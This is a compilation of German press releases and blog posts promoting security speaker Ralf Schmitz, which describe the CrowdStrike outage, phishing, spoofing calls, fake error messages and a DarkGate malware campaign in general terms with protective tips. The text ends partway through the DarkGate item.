Der kürzliche Update-Unfall von CrowdStrike, eine Sicherheitsfirma mit Sitz in Austin in Texas, hat weltweit zu erheblichen IT-Ausfällen geführt. Update-Unfall bei CrowdStrike – legt Banken lahm

Er legte auch Banken lahm.Der bekannte Hacker und Sicherheitsexperte Ralf Schmitz äußerte sich kürzlich dazu.

Eine schwerwiegende Update-Panne betraf rund 8,5 Millionen Microsoft-Computer. Viele Banken konnten kein Geld mehr am Geldautomat auszahlen. Flüge fielen aus. Krankenhäuser sagten Operationen ab. Fernsehsender hatten Schwierigkeiten, Sendungen zu übertragen. Lebensmittelläden mussten vorübergehend schließen.

Schmitz betonte die Dringlichkeit. Nutzer sollten ihre Systeme umgehend überprüfen. Sie sollten notwendige Sicherheitsmaßnahmen nur durch versierte Fachleute ergreifen.

Ethical Hacker Ralf Schmitz weiß aus 25-jähriger Berufserfahrung, dass Hacker jetzt versuchen werden, diese Fehler auszunutzen, da nicht nur die Banken betroffen sind. Im Darknet sind erste Anleitungen zu finden. Sie wollen weitere Schadsoftware ins Netz einspielen.

Mögliche Angriffe durch Skimming-Malware

Web-Skimming: Beschreibung: Schädlicher Code wird auf Websites platziert, um Informationen zu erfassen, die Nutzer in Formulare eingeben.Im Banken- und Versicherungssektor ist eine Zunahme zu verzeichnen.Die Update-Panne machte zahlreiche Computer jetzt anfällig für weitere Cyberangriffe.

Besonders besorgniserregend sind Angriffe durch Skimming-Malware. Diese zielt darauf ab, sensible Daten wie Kreditkarteninformationen und persönliche Identifikationsnummern zu stehlen.

Update-Unfall bei CrowdStrike – legt Banken lahm

Das fehlerhafte Software-Update von CrowdStrike betraf weltweit viele Banken.

Zu den betroffenen Banken gehören:

• Bank of America

• JPMorgan Chase

• Wells Fargo

• Charles Schwab

• TD Bank

• Capital One

• Arvest Bank

• US Bank

Diese Banken erlebten IT-Ausfälle und technische Probleme aufgrund des Updates. Hacker werden versuchen Schwachstelle anzugreifen.

Es gibt verschiedene mögliche Angriffsszenarien.

1. Zero-Day-Exploits: Beschreibung: Angreifer könnten unbekannte Sicherheitslücken nutzen, um Systeme zu kompromittieren.Folgen: Vollständige Kontrolle über betroffene Rechner. Datenverlust. Systemmanipulation.

2. Malware-Infektionen: Beschreibung: Schadsoftware wie Viren, Trojaner oder Ransomware könnte eingeschleust werden.Folgen: Datenverschlüsselung durch Ransomware, Datendiebstahl, Systemschäden.

3. Phishing-Angriffe: Beschreibung: Angreifer könnten Phishing-E-Mails senden. Diese geben vor, offizielle Microsoft-Benachrichtigungen zu sein, um Zugangsdaten zu stehlen.Folgen: Kontoübernahmen.

Mögliche Angriffsszenarien auf Banken und Kunden

4. Phishing-Angriffe: Beschreibung: Angreifer senden Phishing-E-Mails, die wie offizielle Microsoft-Benachrichtigungen aussehen. Sie wollen damit Zugangsdaten stehlen.
Folgen: Kontoübernahmen, weiterer Zugang zu sensiblen Daten.

5. DDoS-Attacken (Distributed Denial of Service):
Beschreibung: Die betroffenen Rechner werden zu einem Botnet zusammengeschlossen. Man verwendet sie für DDoS-Angriffe auf andere Systeme.
Folgen: Unbefugter Zugriff auf kritische Systeme und Daten.

7. Remote Code Execution (RCE):
Beschreibung: Sicherheitslücken ermöglichen es Angreifern, beliebigen Code auf den betroffenen Rechnern auszuführen.
Folgen: Volle Kontrolle über das System, Möglichkeit zur Installation von Malware oder zum Stehlen von Daten.

8. Man-in-the-Middle-Angriffe:
Beschreibung: Angreifer fangen den Datenverkehr zwischen den betroffenen Rechnern und anderen Netzwerken ab. Sie manipulieren den Datenverkehr.
Folgen: Abfangen sensibler Informationen, wie Login-Daten oder persönliche Informationen.

9. Datenexfiltration:
Beschreibung: Angreifer ziehen unbemerkt Daten von den betroffenen Systemen ab.
Folgen: Verlust sensibler und vertraulicher Informationen, mögliche Verstöße gegen Datenschutzbestimmungen.

Hacker Schmitz rät allen betroffenen Nutzern, ihre Systeme zu aktualisieren. Verwenden Sie starke Passwörter. Melden Sie verdächtige Aktivitäten sofort.

Schutzmaßnahmen und Empfehlungen:
• Sicherheitsupdates: Stellen Sie sicher, dass alle verfügbaren Sicherheitsupdates sofort installiert werden.
• Antivirus- und Antimalware-Software: Nutzen Sie aktuelle Sicherheitssoftware. Führen Sie regelmäßige Scans durch.
• Backup-Strategie: Implementieren Sie regelmäßige Backups. So können Sie Daten im Falle eines Angriffs wiederherstellen.
• Sicherheitsbewusstsein: Schulen Sie Benutzer im Erkennen von Phishing-E-Mails und verdächtigem Verhalten.
• Netzwerküberwachung: Implementieren Sie Überwachungs- und Erkennungssysteme. So erkennen Sie verdächtige Aktivitäten frühzeitig.

Es ist wichtig, dass betroffene Organisationen und Einzelpersonen schnell handeln. So minimieren sie das Risiko vor Hackerangriffen, sagt Ralf Schmitz. Er betont, dass Wachsamkeit, frühzeitige Aufklärung der Kunden und die richtigen Sicherheitsmaßnahmen entscheidend sind.

Köln, 20. Juni 2024 – In den letzten Wochen häufen sich Berichte über eine neue Masche von Hackern, die versuchen, durch gefälschte Fehlermeldungen auf Computern und Smartphones ihre Opfer zu täuschen.

Diese Fehlermeldungen sehen täuschend echt aus und sollen die Benutzer dazu bringen, sensible Daten preiszugeben oder schädliche Software herunterzuladen. Der bekannte IT-Sicherheitsexperte Ralf Schmitz warnt vor dieser neuen Gefahr und gibt Tipps, wie man sich schützen kann. Hacker wollen Sie mit gefährlichen Fehlermeldungen infizieren – So schützen Sie sich!

„Die Methode der Hacker ist perfide“, sagt Ralf Schmitz. „Sie nutzen die natürliche Reaktion der Menschen auf Fehlermeldungen aus, um Panik zu erzeugen und dadurch unvorsichtige Handlungen zu provozieren.“

So schützt ihr euch vor gefälschten Fehlermeldungen:

1. Seid skeptisch: Nicht jede Fehlermeldung ist echt. Seid besonders vorsichtig, wenn die Meldung in einem Pop-up erscheint oder einen Download-Link enthält.
2. Prüft die Quelle: Vertraut nur Fehlermeldungen, die von vertrauenswürdigen Programmen oder Betriebssystemen stammen. Meldungen von unbekannten Quellen sollten immer hinterfragt werden.
3. Keine vorschnellen Aktionen: Klicke niemals auf Links oder lade Programme herunter, die in einer Fehlermeldung empfohlen werden. Schließt stattdessen das Fenster und führt einen eigenen Systemcheck durch.
4. Aktuelle Software: Haltet euer Betriebssystem und alle Programme immer auf dem neuesten Stand. Viele Sicherheitslücken werden durch regelmäßige Updates geschlossen.
5. Antivirensoftware: Nutzt eine zuverlässige Antivirensoftware, die in Echtzeit Bedrohungen erkennt und blockiert.
6. Informationen einholen: Wenn ihr unsicher seid, sucht im Internet nach Informationen zu der Fehlermeldung. Oft gibt es bereits Hinweise und Warnungen von anderen Nutzern.
7. Gebt die Fehlermeldung in einen Browser z. B. Browser DuckDuckGo ein und schaut kritisch die Ergebnisse an. Wenn viele andere User die gleiche Fehlermeldung erhalten, ist sie mit großer Wahrscheinlichkeit nicht echt.

Hacker wollen Sie mit gefährlichen Fehlermeldungen infizieren – So schützen Sie sich!

„Mit ein wenig Vorsicht und den richtigen Sicherheitsmaßnahmen könnt ihr euch effektiv vor diesen Angriffen schützen“, betont Ralf Schmitz. „Lernt, die Tricks der Hacker zu durchschauen und bleibt wachsam.“

Für weitere Informationen und individuelle Beratung bietet Ralf Schmitz spezielle Sicherheitsseminare und Vorträge an. Mehr dazu auf seiner Webseite unter www.sicher-stark.com

Kontakt:

Über Ralf Schmitz: Ralf Schmitz ist seit über 20 Jahren als IT-Sicherheitsexperte tätig und hat sich auf die Aufklärung und Schulung im Bereich Cyber-Security spezialisiert. Er ist Autor mehrerer Fachartikel und regelmäßig in den Medien als Experte zu sehen.

Fellbach, 25. April 2024 – Ralf Schmitz, der renommierte Cyber-Sicherheitsexperte, hielt gestern einen aufschlussreichen Vortrag bei der Volksbank Württemberg eG, der die Zuhörer sowohl informierte als auch unterhielt.

Schmitz, der oft als „Hacker mit einem Herz für Sicherheit“ bezeichnet wird, teilte seine Einsichten über die neuesten Trends in der Cyber-Sicherheit und demonstrierte, wie man sich gegen Online-Bedrohungen schützen kann. Ralf Schmitz, der renommierte Cyber-Sicherheitsexperte, hielt gestern einen aufschlussreichen Hacker-Vortrag.

Die Veranstaltung, die gut von der Volksbank am Würtenberg e.G. organisiert wurde, zog ein breites Publikum an, darunter kleine Unternehmer, Privatpersonen und Depotkunden. Schmitz‘ Fähigkeit, komplexe Themen verständlich zu machen, wurde besonders geschätzt. „Ich habe nie verstanden, wie Phishing-Angriffe funktionieren, aber Ralf Schmitz hat es mit einer solchen Klarheit erklärt, dass ich jetzt viel vorsichtiger sein werde“, sagte eine Teilnehmerin.

Ein anderer Besucher äußerte sich ähnlich: „Seine Tipps zur Passwortsicherheit waren ein Weckruf. Ich werde definitiv meine Online-Gewohnheiten ändern.“ Schmitz‘ interaktive Präsentation, die praktische Demonstrationen von Hacking-Techniken beinhaltete, ohne dabei echte Daten zu gefährden, wurde als „Augenöffner“ bezeichnet.

Ralf Schmitz, der renommierte Cyber-Sicherheitsexperte, hielt gestern einen aufschlussreichen Hacker-Vortrag

Die Volksbank Württemberg eG zeigte sich erfreut über die positive Resonanz. „Wir sind stolz darauf, Experten wie Ralf Schmitz einzuladen, die unsere Kunden und die Gemeinschaft aufklären können“, sagte der Vorstand Sascha Becker. „Cyber-Sicherheit ist ein wesentlicher Bestandteil des digitalen Zeitalters, und Bildung ist der Schlüssel zur Prävention.“

Schmitz, der sich nach seinem Vortrag Zeit nahm, um Fragen zu beantworten und mit den Teilnehmern zu diskutieren, betonte die Bedeutung von Proaktivität. „Wir müssen alle Teil der Lösung sein.

Der Mensch hinter dem PC, ist noch immer eine Schwachstelle, die geschult werden sollte, da hilft die beste IT-Struktur im Unternehmen nicht“, sagte er. „Es beginnt mit dem Bewusstsein und endet mit der Umsetzung des Gelernten.“

Die künstliche Intilligenz (Ki) ist leider für Hacker eine neue sehr interessante Spielwiese geworden, wo in Minuten Programmcodes geschrieben werden können oder Phishing-Mails durch KI aufgesetzt werden.

Die Veranstaltung endete mit einem Fingerfood, bei dem die Teilnehmer die Gelegenheit hatten, sich persönlich mit Schmitz auszutauschen und individuelle Anliegen zu besprechen. Die Volksbank Württemberg eG plant, weitere solcher Veranstaltungen zu organisieren, um das Bewusstsein für Cyber-Sicherheit zu stärken.

Chatbots: Ein Einblick in die Zukunft der Interaktion und die Herausforderungen der Cybersicherheit

In einer zunehmend digitalisierten Welt eröffnen Chatbots neue Türen für Interaktion und Kommunikation. Diese künstlichen Intelligenzen (KI) revolutionieren nicht nur den Kundenservice, sondern auch verschiedene andere Branchen. Doch mit der zunehmenden Verbreitung von Chatbots gehen auch neue Herausforderungen im Bereich der Cybersicherheit einher.

Chatbots öffnen neue Türen und kapern Computer!

Chatbots bieten eine innovative Möglichkeit, mit Kunden zu interagieren, Fragen zu beantworten und sogar komplexe Aufgaben zu erledigen – alles in Echtzeit und ohne menschliches Eingreifen. Von der Unterstützung bei Online-Einkäufen bis hin zur Terminvereinbarung können Chatbots effiziente und benutzerfreundliche Lösungen bieten.

Jedoch sind sie nicht immun gegen die Bedrohungen durch Cyberkriminalität. Hacker wie Ralf Schmitz haben bereits gezeigt, wie anfällig Chatbots für Angriffe sein können. Durch geschicktes Ausnutzen von Sicherheitslücken können Hacker sensible Daten stehlen, Systeme manipulieren und sogar ganze Unternehmen lahmlegen. Diese Gefahren dürfen nicht unterschätzt werden.

Ralf Schmitz, bekannt für seine Expertise im Bereich Cyberkriminalität, betont die Dringlichkeit, die Sicherheit von Chatbots zu stärken. „Chatbots sind ein attraktives Ziel für Hacker, da sie oft Zugang zu sensiblen Informationen haben. Unternehmen müssen daher proaktiv handeln, um ihre Chatbot-Systeme abzusichern und potenzielle Schwachstellen zu identifizieren und zu beheben“, erklärt Schmitz.

Chatbots und die neuen Gefahren!

Um die Sicherheit von Chatbots zu gewährleisten, sind mehrere Maßnahmen erforderlich. Dazu gehören regelmäßige Sicherheitsaudits, die Implementierung von Verschlüsselungstechnologien, Schulungen für Mitarbeiter zur Erkennung von Phishing-Angriffen und die kontinuierliche Überwachung auf verdächtige Aktivitäten.

Dennoch dürfen diese Sicherheitsvorkehrungen nicht die Innovationskraft von Chatbots einschränken. Diese Technologie bietet ein enormes Potenzial, um die Effizienz zu steigern, Kosten zu senken und die Kundenzufriedenheit zu verbessern. Es ist daher von entscheidender Bedeutung, einen ausgewogenen Ansatz zu finden, der sowohl die Sicherheit als auch die Funktionalität von Chatbots berücksichtigt.

Hacker beim hacken von Chatbots

In einer Zeit, in der digitale Interaktionen immer wichtiger werden, sind Chatbots zweifellos ein wesentlicher Bestandteil der Zukunft. Durch eine proaktive Herangehensweise an die Cybersicherheit können Unternehmen das volle Potenzial dieser Technologie nutzen und gleichzeitig ihre Daten und Systeme schützen. Die Sicherheit darf aber nicht auf der Strecke bleiben. Hören Sie dazu auch folgenden Bericht.

Elsen, 01. März 2024 – Die Volksbank Elsen stellt die Sicherheit ihrer Kunden in den Fokus und präsentiert ein exklusives Seminar zum Thema Internetsicherheit bei Banken. Die Veranstaltung – unter der Leitung des renommierten Cybersicherheitsexperten Ralf Schmitz – findet am 17. April 2024 statt und richtet sich an 100 ausgewählte Firmenkunden der Volksbank Elsen-Wewer-Borchen. Internetsicherheit bei Banken im Fokus:

Internetsicherheit bei Banken im Fokus: Exklusiver Vortrag mit Ethical-Hacker Ralf Schmitz am 17. April 2024 in der Volksbank Elsen-Wewer-BorchenExklusiver Vortrag mit Ethical-Hacker Ralf Schmitz am 17. April 2024 in der Volksbank Elsen-Wewer-Borchen.

Ralf Schmitz freut sich darüber, sein Wissen am 17.04.24 auf der Bühne beim „Live-Hacking“ an die geladenen Gäste und Kunden der Volksbank weiterzugeben.

Hintergrund: Die Priorisierung von Internetsicherheit für Banken in Zeiten fortschreitender Digitalisierung gewinnt beim Online-Banking und im Umgang mit persönlichen Finanzdaten zunehmend an Bedeutung. Cyberkriminalität entwickelt sich ständig weiter und Banken stehen im Fokus von Angreifern, die sensible Kundendaten und finanzielle Ressourcen entwenden, fälschen oder fehlleiten wollen.

Daher ist ein proaktiver und praxisrelevanter Ansatz im Bereich der Internetsicherheit entscheidend.

Internetsicherheit bei Banken im Fokus: Exklusiver Vortrag mit Ethical-Hacker Ralf Schmitz am 17. April 2024 in der Volksbank Elsen-Wewer-Borchen

Spoofing-Anrufe, Phishing und der Versand gefälschter E-Mails werden immer häufiger mit raffinierteren Methoden.  Die Betrüger sind so gut geworden, dass es immer schwieriger wird, gefälschte von echten Mails zu unterscheiden. Ralf Schmitz hat viele Beispiele dabei, die er seinem Publikum präsentieren wird.

Ethical-Hacker Ralf Schmitz  

Seminarinhalte: Wissensvermittlung auf höchstem Niveau

Der Hacker-Vortrag von Ralf Schmitz bietet einen umfassenden Überblick über die neuesten Entwicklungen im Bereich der Cyberkriminalität, insbesondere im Bankensektor. Folgende Themen werden behandelt:

1. Aktuelle Bedrohungen im Online-Banking: Ralf Schmitz wird auf die neuesten Trends und Taktiken eingehen, mit denen Cyberkriminelle versuchen, Zugang zu Bankkonten zu bekommen und sensible Informationen abzuschöpfen.
2. Förderung des Sicherheitsbewusstseins: Die Teilnehmer werden dafür sensibilisiert auch für die eigene Sicherheit im Netz zu sorgen. Praktische Tipps und Empfehlungen werden vorgestellt, um das Bewusstsein für potentielle Risiken zu schärfen.
3.  Technologische Lösungen für mehr Sicherheit: Ralf Schmitz wird die fortschrittlichsten Sicherheitslösungen vorstellen, die Banken implementieren können, um ihre Kunden vor Cyber-Bedrohungen zu schützen.
4.  Fragerunde und Interaktion: Die Teilnehmer haben die Möglichkeit, direkt mit Ralf Schmitz zu interagieren und spezifische Fragen zu stellen, um ihr Verständnis von Cybersicherheit für Banken zu vertiefen. .

Über Ralf Schmitz

Ralf Schmitz ist ein renommierter Ethical-Hacker und Cybersicherheitsexperte mit umfangreicher Erfahrung in der Identifizierung und Bekämpfung von Cyberbedrohungen. Sein Ziel ist es, Unternehmen und Banken dabei zu unterstützen, sich effektiv vor digitalen Angriffen zu schützen.

Über die Volksbank Elsen-Wewer-Borchen

Die Volksbank Elsen steht seit über 100 Jahren im Dienste ihrer Mitglieder und Kunden. Mit einem klaren Fokus auf Vertrauen, Service und Innovation ist die Bank bestrebt, die finanziellen Bedürfnisse ihrer Kunden bestmöglich zu erfüllen und gleichzeitig höchste Sicherheitsstandards zu gewährleisten.

Pressekontakt:

Volksbank Elsen, Wewer, Borchen Pressestelle Kontakt: Sabine Fischer Telefon: 05254 661-0 E-Mail: presse (at) volksbank-elsen.de

Hinweis für die Redaktionen: Journalisten, die an der Veranstaltung teilnehmen möchten, werden gebeten, sich vorab zu akkreditieren. Akkreditierungsanfragen können auch an die oben genannte Pressestelle gerichtet werden.

Die Volksbank am Württemberg legt großen Wert auf stetige Investitionen in IT-Sicherheit und Aufklärung im Hinblick auf Cybercrime und Cybersecurity. Cyberrisk & Cybersecurity – Die Volksbank am Württemberg informiert.

Daher veranstaltet die um den Württemberg regional verankerte Bank am 25. April 2024, für Ihre FirmenkundInnen, eine spannende und informative Veranstaltung zum Thema Cyberrisk und Cybersecurity 2024: Aktuelle Tipps und Tricks für Internetsicherheit bei Bankgeschäften, Risiken im Netz sowie Möglichkeiten der Absicherung.

Ralf Schmitz, renommierter Hacker und Sicherheitsexperte, gibt neue Einblicke in die aktuelle Situation und den „Giftschrank der Hackerszene“ sowie die Zukunft der Cyberkriminalität, die immer raffinierter und gefährlicher wird.

„Cyberrisk & Cybersecurity 2024“ – Die Volksbank am Württemberg informiert

Ethical-Hacker Ralf Schmitz

Hacker versuchen mit Phishing, Malware, Ransomware, Social Engineering und anderen Methoden an sensible Daten zu kommen

Er zeigt auf, wie Hacker mit Phishing, Malware, Ransomware, Social Engineering und anderen Methoden versuchen, an sensible Daten und Gelder von BankkundInnen zu gelangen. Er warnt vor den Risiken, die das Internet für die Privatsphäre, die Identität und die Finanzen der NutzerInnen birgt.

Außerdem wird er den TeilnehmerInnen praktische Tipps und Tricks zeigen, wie man sich vor Cyber-Angriffen schützen und sicher im Internet surfen sowie Bankgeschäfte erledigen kann.

Unternehmen Opfer von Cyber- oder Wirtschaftskriminalität

Die Frage ist nicht, ob Ihr Unternehmen Opfer von Cyber- oder Wirtschaftskriminalität wird, sondern nur wann. Auch wenn alle möglichen vorbeugenden Maßnahmen ergriffen sind, ist das Risiko hoch, Opfer krimineller Handlungen zu werden.

Denn Wirtschaftskriminalität und Cyber-Attacken sind in unserer digitalen Welt keine Seltenheit mehr und die damit verbundenen finanziellen Schwierigkeiten können die Existenz Ihres Unternehmens schnell gefährden.

Ganz nach dem Motto „Zukunft digital gestalten und gemeinsam vorausdenken“ erfahren Sie im Vortrag von Ingo Steinwedel von der R+V-Versicherung, wie Sie sich finanziell bestens darauf vorbereiten und wie im Schadensfall die Expertenteams der R+V Sie gemeinsam mit Ihrem IT-Dienstleister praktisch, schnell und zuverlässig unterstützen. Wir freuen uns.

Ingo Steinwedel, Produktförderer MultiLine – R+V Versicherung

Für weitere Informationen kontaktieren Sie bitte:

Volksbank am Württemberg eG

Laura Serby

Tel.: 0711/30501 4303

E-Mail: laura.serby ( at ) voba-aw.de

Web: www.voba-aw.de

Die Sparkassen warnen ihre Kunden vor einer neuen Betrugsmasche, dem so genannten „Spoofing“. Dabei rufen Betrüger die Kunden an und geben sich als Mitarbeiter der Sparkasse aus. Dabei verwenden sie eine gefälschte Telefonnummer, die der echten Sparkassennummer ähnelt. Achtung! Spoofing-Anrufe von Sparkassen.

Die Betrüger versuchen, an die Zugangsdaten zum Online-Banking oder an persönliche Daten der Kunden zu gelangen.

Die Masche ist nicht neu, aber nach wie vor gefährlich. Bereits im vergangenen Jahr haben Sparkassen aus verschiedenen Bundesländern in ihrem Blog über Spoofing-Anrufe berichtet, weiß Sicherheitsexperte Ralf Schmitz.

Die Kriminelle nutzen dabei verschiedene Vorwände, um die Kunden zu täuschen. So wird beispielsweise behauptet, dass der Computer des Kunden von Viren befallen sei, ein neues Sicherheitszertifikat benötigt würden oder eine verdächtige Transaktion auf dem Konto stattgefunden hätte.

Achtung! Spoofing-Anrufe von Sparkassen

Die Betrüger fordern den Kunden dann auf, eine Fernwartungssoftware zu installieren, eine TAN einzugeben oder eine Überweisung zu tätigen.

Die Sparkassen weisen darauf hin, dass sie niemals unaufgefordert anrufen und nach persönlichen Daten oder Zugangsdaten fragen. Kunden sollten solche Anrufe sofort beenden und die Nummer der Sparkasse zurückrufen, um die Echtheit des Anrufs zu überprüfen.

Bei Verdacht auf einen Spoofing-Versuch sollten sich Kunden umgehend mit ihrer Sparkasse in Verbindung setzen und gegebenenfalls den Online-Banking-Zugang oder die Kreditkarte sperren lassen.

Die Sparkassen bieten ihren Kunden verschiedene Möglichkeiten, sich vor Spoofing-Anrufen zu schützen. Dazu gehören unter anderem

– Die Nutzung der Sparkassen-App, die eine sichere TAN-Generierung auf dem Smartphone ermöglicht.

– Die Aktivierung der Funktion „Vertrauenswürdige Geräte“, die nur die Anmeldung von zuvor registrierten Geräten zulässt.

– Die regelmäßige Überprüfung der Kontobewegungen und Umsätze im Online-Banking.

– Die Beachtung der aktuellen Sicherheitshinweise auf der Internetseite der Sparkassen https://www.sparkasse.de/service/sicherheit-im-internet.html

Die Sparkassen nehmen die Sicherheit ihrer Kunden sehr ernst und arbeiten ständig an der Verbesserung ihrer Systeme und Prozesse.

Sie bitten ihre Kunden, wachsam zu sein und verdächtige Vorfälle zu melden. Um die Kunden für das Thema Spoofing zu sensibilisieren, bieten sie auch Sicherheitsvorträge an, in denen der bekannte Ethical-Hacker Ralf Schmitz die Tricks und Methoden der Betrüger aufdeckt.

Ralf Schmitz ist ein ehemaliger Polizeibeamter mit SEK und GSG9 Erfahrung, der heute als Sicherheitsexperte und Trainer tätig ist. In seinen Vorträgen zeigt er, wie einfach es ist, sich als Sparkassenmitarbeiter auszugeben und wie man sich davor schützen kann.

Außerdem erklärt er, wie man Phishing-Mails, Fake-SMS oder andere Betrugsversuche erkennt und vermeidet sowie die Sicherheit am Handy, Tablet oder PC erhöht. 

Die Sicherheitsvorträge von Ralf Schmitz finden in Sparkassen / Banken statt und sind für die Kunden der Sparkasse in der Regel kostenlos.  Die Hacker-Vorträge sind für alle Sparkassen-Kunden, Mitarbeiter und auch Nicht-Kunden geeignet, die mehr über Spoofing und andere Betrugsmaschen erfahren möchten.

Die Sparkassen hoffen, dass die Kunden durch die Vorträge von Ralf Schmitz besser informiert und geschützt werden. Sie appellieren an die Kunden, niemals auf verdächtige Anrufe, E-Mails oder SMS zu reagieren und immer die offiziellen Kontaktwege der Sparkassen zu nutzen.

Die Volksbanken und Raiffeisenbanken warnen ihre Kunden vor einer Zunahme von Phishing-Angriffen in der Weihnachtszeit. Dabei versuchen Betrüger, mit gefälschten E-Mails oder SMS an die Zugangsdaten zum Onlinebanking oder zur VR SecureGo plus-App zu gelangen. Volksbanken warnen ausdrücklich vor diesen Phishing-Angriffen in der Weihnachtszeit

Die Phishing-Nachrichten sind oft täuschend echt gestaltet und enthalten einen Link zu einer gefälschten Webseite, auf der die Kunden ihre Daten eingeben sollen.

Die Betrüger nutzen dabei verschiedene Vorwände, wie zum Beispiel ein Weihnachtsgewinnspiel, eine Aufforderung zu einer notwendigen Umstellung auf ein neues Sicherheitssystem oder eine drohende Sperrung der VR SecureGo plus-App, Betrüger versenden auch gefälschte Booking.com-Nachrichten, um Zugangsdaten zu erlangen oder Kontaktversuche von vermeintlichen Bankmitarbeitern, um TAN-Freigaben für digitale Girocards zu erreichen. Das sind nur einige der perfide Betrugsmaschen, die Hacker Ralf Schmitz in seinen Sicherheitsvorträgen vorstellt.

Die Volksbanken und Raiffeisenbanken weisen darauf hin, dass sie niemals per E-Mail oder SMS nach persönlichen Daten oder Zugangsdaten fragen. Kunden sollten solche Nachrichten sofort löschen und nicht auf Links oder Anhänge klicken. Wenn Kunden einen Phishing-Versuch vermuten, sollten sie sich umgehend an ihre Volksbank oder Raiffeisenbank wenden und gegebenenfalls ihren Online-Banking-Zugang oder ihre Kreditkarte sperren lassen.

Die Volksbanken und Raiffeisenbanken bieten ihren Kunden verschiedene Möglichkeiten, sich vor Phishing-Angriffen zu schützen. Dazu gehören unter anderem:

• Die Nutzung der VR SecureGo plus-App, die eine TAN-Generierung auf dem Smartphone ermöglicht.
• Die Aktivierung der Funktion „Vertrauenswürdige Geräte“, die nur die Anmeldung von zuvor registrierten Geräten erlaubt.
• Die regelmäßige Überprüfung der Kontobewegungen und der digitalen Girocards im Online-Banking.
• Die Beachtung der aktuellen Phishing-Warnungen auf der Webseite der Volksbanken und Raiffeisenbanken https://www.volksbank-eg.de/banking-service/sicherheit/phishing-warnungen.html.

Die Volksbanken und Raiffeisenbanken nehmen die Sicherheit ihrer Kunden sehr ernst und arbeiten ständig daran, ihre Systeme und Prozesse zu verbessern. Sie bitten ihre Kunden, wachsam zu sein und verdächtige Vorfälle zu melden oder die Sicherheitsvorträge zu besuchen.

Es gibt ein paar Wahrheiten über Phishing-Mails: Erstens nerven sie, zweitens werden sie immer ausgefeilter, drittens sind sie eigentlich leicht als Betrugsversuche zu identifizieren. Und zuletzt: Darauf hereinfallen tun immer nur die anderen. Phishing-Mails und die neusten Tricks „Das würde mir doch nie passieren.“

Trotzdem wurde bereits die IT der Uni-Klinik in Düsseldorf komplett zum Stillstand gebracht. Operationen musste abgesagt werden, die Notaufnahme wurde überlastet. Hacker übernahmen sogar die Rechner der Kommunalverwaltung Anhalt-Bitterfeld. Es dauerte acht Monate, bis der Notbetrieb wieder aufgehoben werden konnte. Nur weil irgendjemand so einen blöden Link in einer E-Mail angeklickt hatte.

Was bewegt überhaupt Menschen, auf die Links in solchen Mails zu klicken, obwohl sie es besser wissen müssten? Liegt es an mangelndem Problembewusstsein der Mitarbeiterinnen und Mitarbeiter? An Langeweile? Ein Forscherteam der Friedrich-Alexander-Universität Erlangen ging dieser Frage nach und kam zu der Erkenntnis, dass der Hauptgrund schlichte Neugier ist, gepaart mit einem Inhalt, der einen Bezug zum Empfänger hat. Es ist also mehr ein psychologisches als ein technisches Phänomen.

Phishing-Mails und die neusten Tricks…

In dem zugrundeliegenden Experiment schickten die Wissenschaftler kurz nach Neujahr eine Mail an 1.200 Studentinnen und Studenten. Der Inhalt war ganz unverdächtig und lautete, die Silvesterparty sei toll gewesen und hier seien die Bilder davon. Zusammen mit dem Hinweis, man solle die Bilder niemandem zeigen, der nicht dabei war.

Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden.

Die Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden. Die Klickrate betrug stolze 25 Prozent. Also hatten ein Viertel der Adressaten den Link in der E-Mail angeklickt, obwohl die Fete nie stattgefunden hatte. Selbstredend, dass die Wissenschaftlerinnen und Wissenschaftler keinen Schaden anrichteten und lediglich verzeichneten, wer reingefallen war.

Hacker Ralf Schmitz berichtet….

Als man die Versuchspersonen später nach den Gründen für den Klick befragte, sagten 34 Prozent, sie seien einfach neugierig auf die Fotos gewesen, 27 Prozent nannten den passenden Zeitpunkt kurz nach Silvester und 16 Prozent meinten, die Absender-Adresse zu kennen. Diese Zahlen belegen nur den Eindruck, den Sicherheitsverantwortliche in den letzten Jahren gewinnen konnten: Gerade die Aussicht auf Bilder ließ die Angesprochenen auf Links klicken. Und je besser der Text in die gegenwärtige Situation des Empfängers passt, desto wahrscheinlicher ist die Aktion erfolgreich.

Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert.

Die Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert. Sie feilen nur noch am Kontext immer genauer. Mit ein wenig Recherche in Sozialen Medien, Facebook bietet sich da an, noch besser sind aber LinkedIn und Xing, ist es kein großer Aufwand, eine Mail auf den Empfänger maßzuschneidern. Wenn nämlich persönliche oder berufliche Details in der E-Mail auftauchen, Firmennamen oder Jobwechsel, lassen diese den Inhalt umso glaubhafter erscheinen. Selbst hier könnte Künstliche Intelligenz helfen, den Betrügern in Zukunft viel Handarbeit zu ersparen.

Die Leiterin der zuvor genannten Studie, Frau Dr. Benenson, sagt wohl zu Recht, dass mit sorgfältiger Planung und Ausführung jeder dazu gebracht werden kann, solch einen Link anzuklicken, und sei es nur aus Neugier. Oder aus Angst, weil angedroht wird, Konten zu sperren oder angeblich teure Bestellungen getätigt zu haben.

Die Cyber-Halunken wenden demnach ganz simple psychologische Tricks an, um die Opfer in die Falle zu locken.

Phishing-Mails wenden psychologische Tricks an!

Was also ist die Konsequenz für Unternehmen und Institute daraus? An einer entsprechenden Schulung der Mitarbeiter, in der sie für die Problematik sensibilisiert werden, führt kein Weg vorbei, dies gilt gerade für technisch weniger versierte Angestellte. Für private Nutzerinnen und Nutzer vielleicht dieser Tipp: Wenn es emotional wird, wenn Neugier oder Angst die Kontrolle übernehmen könnten, die Nachricht sofort löschen. Banken, Sparkassen und Online-Händler schicken niemals emotionale Angelhaken.

Noch fragen sie nach Kontodaten oder wollen persönliche Angaben. Doch, so schade es ist, gibt es keinen 100%-igen Schutz vor digitalem Betrug. Doch es hilft schon, sich einfach mit solchen Themen zu beschäftigen. Denn auch hier macht Übung den Meister.

Eine besonders tückische Malware mit dem Namen „DarkGate“ wird derzeit über Skype- und Teams-Konten übertragen. Hacker verteilen Malware über Microsoft Teams und Skype.

Zur Zeit läuft aktuell eine Hacker-Kampagne, bei der Cyberkriminelle Microsofts Kommunikationsplattformen Skype und Teams missbrauchen, um die Malware

zu verteilen, so der Ethical- Hacker Ralf Schmitz.

 Wie die Angriffe ablaufen und wie Sie sich schützen können erklärt  Ralf Schmitz.

Die Hacker nutzen kompromittierte Skype-Konten, um Nachrichten mit VBA-Loader-Skript-Anhängen zu verschicken, die sich als PDF-Dokument ausgeben.

